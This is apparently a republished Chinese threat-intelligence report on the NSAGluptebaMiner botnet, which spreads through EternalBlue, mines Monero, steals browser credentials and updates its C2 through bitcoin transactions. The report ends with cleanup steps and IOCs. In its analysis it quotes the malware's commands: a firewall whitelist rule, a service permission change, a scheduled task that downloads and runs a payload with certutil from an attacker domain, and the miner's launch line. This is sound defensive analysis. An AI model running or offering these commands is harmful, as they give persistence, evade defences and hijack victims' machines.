挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

感谢腾讯御见威胁情报中心来稿!

原文链接:https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ

 

一、概述

腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。

cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。

当前NSAGluptebaMiner版本具有以下特征:

  1. 利用永恒之蓝漏洞攻击传播;
  2. 安装计划任务实现持久化,任务利用certutil.exe下载木马;
  3. 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传;
  4. 绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单;
  5. 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护;
  6. 运行门罗币挖矿程序wup.exe;
  7. 利用组件cloudnet.exe构建僵尸网络;
  8. 连接远程服务器,接收指令完成远控操作;
  9. 通过比特币交易数据更新C2地址。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

二、详细分析

漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:/Windows/rss/csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。

下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER/Software/Microsoft/<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS/ <sid>/Software/Microsoft/TestApp)挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

首先会检测是否在虚拟机中执行。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

在”C:/Windows/System32/drivers/”目录下释放三个隐藏的sys文件,并加载对应的驱动程序:

  • Winmon.sys用于隐藏对应PID进程;
  • WinmonFS.sys隐藏指定文件或目录;
  • WinmonProcessMonitor.sys查找指定进程,并关闭。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

下载矿机和挖矿代理配置信息。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播 挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播 挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

在handleCommand函数中实现后门功能,包括下载文件、程序执行等。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播 挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

各函数及对应操作如下:

函数 操作
GetAppName 获取App名
IsAdmin 是否Admin账号
ProcessIsRunning 进程是否运行
Update 更新
Exec 执行程序
Download 下载
DownloadAndRun 下载并执行
DownloadAndRunExtended 下载并执行扩展
Exit 退出
UpdateData 更新数据
UpdateCloudnet 更新cloudnet.exe
StopWUP 停止挖矿程序wup.exe
UpdateService 更新服务
GetLogfileProxy 读取日志文件/proxy/t
GetLogfileI2Pd 读取日志文件/i2pd/i2pd.log
Notify 开启心跳包,在指定的时间间隔进行上报
NotifyHost 上报主机
EventExists 判断event是否存在
MutexExists 判断Mutuex是否存在
RegistryGetStartup 注册自启动项
VerifySignature 验证文件签名
RegistryGetStartupSignatures 验证启动项文件签名
VerifyProcessesSignatures 验证进程文件签名
GetUnverifiedFiles 上报未签名的文件
GetStatsWUP 获取挖矿木马统计信息
UploadFile 上传文件
Install 下载并安装
SC 截屏
UpdateCDN 更新C2
DiscoverElectrum 使用硬编码的以太币钱包,读取区块链交易数据
DiscoverBlockchaincom

从区块链交易数据中获取加密的新的C2地址

设置防火墙规则,将csrss.exe添加到白名单:

`netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:/Windows/rss/csrss.exe” enable=yes`

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单:

cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

 

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行:

`schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:/Users/admin/AppData/Local/Temp/csrss/scheduled.exe && C:/Users/admin/AppData/Local/Temp/csrss/scheduled.exe /31340” /TN ScheduledUpdate /F`

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

灵活更新C2:

通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。
运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/CloudNet”下写入文件版本、路径等信息,移动自身到“/cloudnet/”文件夹下,连接C2服务器,接收远控指令。

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数

`C:/Users/Administrator/AppData/Local/Temp/wup/wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background`

Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件C:/Users/Administrator/AppData/Local/Temp/csrss/wup/xarch/wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。

 33 34

三、安全建议



挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

也可检查以下各项,如有进行清除:

目录和文件:
C:/Users/Administrator/AppData/LoCal/Temp/Csrss/smb/
C:/users/administrator/appdata/loCal/temp/Csrss/
C:/Windows/rss/Csrss.exe
C:/Windows/windefender.exe
C:/Windows/System32/drivers/Winmon.sys
C:/Windows/System32/drivers/WinmonFS.sys
C:/Windows/System32/drivers/WinmonProCessMonitor.sys
C:/users/administrator/appdata/loCal/temp/Csrss/Cloudnet.exe
C:/Users/Administrator/AppData/LoCal/Temp/Csrss/sCheduled.exe
C:/Users/Administrator/AppData/LoCal/Temp/Csrss/updateprofile.exe
C:/Users/Administrator/AppData/LoCal/Temp/wup/wup.exe
C:/Users/Administrator/AppData/LoCal/Temp/Csrss/wup/xarCh/wup.exe

注册表:
HKEY_CURRENT_USER/SOFTWARE/MiCrosoft/TestApp
HKEY_CURRENT_USER/SOFTWARE/MiCrosoft/<random>/<random>
HKEY_CURRENT_USER/SOFTWARE/EpiCNet InC./CloudNet
HKEY_CURRENT_USER/Software/MiCrosoft/<random>
HKEY_LOCAL_MACHINE/System/CurrentControlSet/ServiCes/Winmon
HKEY_LOCAL_MACHINE/System/CurrentControlSet/ServiCes/WinmonFS
HKEY_LOCAL_MACHINE/System/CurrentControlSet/ServiCes/WinmonProCessMonitor
HKEY_USERS/sid/Software/MiCrosoft/Windows/CurrentVersion/Run/DeliCateFrost

计划任务:
ScheduledUpdate

IOCs

Domain
biggames.club
biggames.online
deepsound.live
sndvoices.com
2makestorage.com
infocarnames.ru

URL
http[:]//biggames.club/app/app.exe
https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe

md5
b1c081429c23e3ef0268fd33e2fe79f9
da75bc9d4d74a7ae4883bfa66aa8e99b
00201e5ad4e27ff63ea32fb9a9bb2c2e
6918fd63f9ec3126b25ce7f059b7726a
fcf8643ff7ffe5e236aa957d108958c9
9b47b9f19455bf56138ddb81c93b6c0c
0dbecc91932301ccc685b9272c717d61

矿池:

premiumprice.shop:50001

参考链接

  1. https://www.freebuf.com/articles/system/172929.html
  2. https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/
© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论